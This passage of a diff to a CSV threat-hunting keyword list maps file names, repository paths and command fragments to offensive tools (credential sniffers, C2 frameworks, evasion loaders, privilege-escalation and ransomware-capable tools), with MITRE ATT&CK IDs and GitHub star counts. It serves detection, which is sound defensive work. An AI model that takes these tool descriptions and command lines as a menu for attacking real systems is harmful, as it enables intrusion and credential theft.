Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*DanMcInerney/icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*DanMcInerney/net-creds*","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","1","N/A","N/A","10","1560","443","2022-03-23T10:40:42Z","2015-01-07T18:47:46Z" +"*DanMcInerney/net-creds*","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","1","N/A","N/A","10","1562","443","2022-03-23T10:40:42Z","2015-01-07T18:47:46Z" "*DanMcInerney/theHarvester*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*daphne-main.zip*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*daphne-x64 * pid=*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","0","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*darkarmour -f *.exe --encrypt xor --jmp --loop 7 -o *.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*darkarmour.py*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*darkarmour-master*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" -"*DarkCoderSc/SharpShellPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*DarkCoderSc/SharpShellPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" "*darkhotel backdoor*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*DarkHotel C2*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*darkhotel data exfil server*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*darkhotel_headers*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*DarkLoadLibrary-maser*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","874","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" -"*darkr4y/geacon*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*DarkLoadLibrary-maser*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" +"*darkr4y/geacon*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*DarkRCovery.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*DarkWidow-main*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" "*das add -db dbname masscan *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -9091,21 +9239,21 @@ "*das report -hosts 192.168.1.0/24 -oA report2*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*das scan -db dbname -hosts all -oA report1 -nmap '-Pn -sVC -O' -parallel*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*das scan -db dbname -ports 22*80*443*445 -show*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*dashlane2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*data/ipwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*dashlane2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*data/ipwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*data/payloads/stager.ps1*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" -"*data/shell/backdoors*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*data/shell/stagers*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*data/shell/backdoors*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*data/shell/stagers*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*data/wordlist_256.txt*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" -"*data/wordlists*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*data/wordlists*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Data\VulnerableCOM.csv*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" -"*DataSploit*","offensive_tool_keyword","datasploit","Performs OSINT on a domain / email / username / phone and find out information from different sources","T1247 - T1593 - T1271 - T1110 - T1122 - T1123","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/dvopsway/datasploit","1","1","N/A","N/A","3","227","670","2022-12-04T16:02:57Z","2016-05-26T03:34:43Z" +"*DataSploit*","offensive_tool_keyword","datasploit","Performs OSINT on a domain / email / username / phone and find out information from different sources","T1247 - T1593 - T1271 - T1110 - T1122 - T1123","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/dvopsway/datasploit","1","1","N/A","N/A","3","227","669","2022-12-04T16:02:57Z","2016-05-26T03:34:43Z" "*datr=80ZzUfKqDOjwL8pauwqMjHTa*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*DavidXanatos/DiskCryptor*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" -"*DavRelayUp.csproj*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" -"*DavRelayUp.exe*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" -"*DavRelayUp.sln*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" -"*DavRelayUp-master*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*DavRelayUp.csproj*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*DavRelayUp.exe*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*DavRelayUp.sln*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*DavRelayUp-master*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*dazzleUP.cna*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP.exe*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP.sln*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" @@ -9114,8 +9262,8 @@ "*dazzleUP.x64.exe*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP_Reflective_DLL*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP-master*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" -"*db2_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*db2_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*db2_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*db2_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*DBC2.git*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2_agent.cs*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2_agent.exe*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - 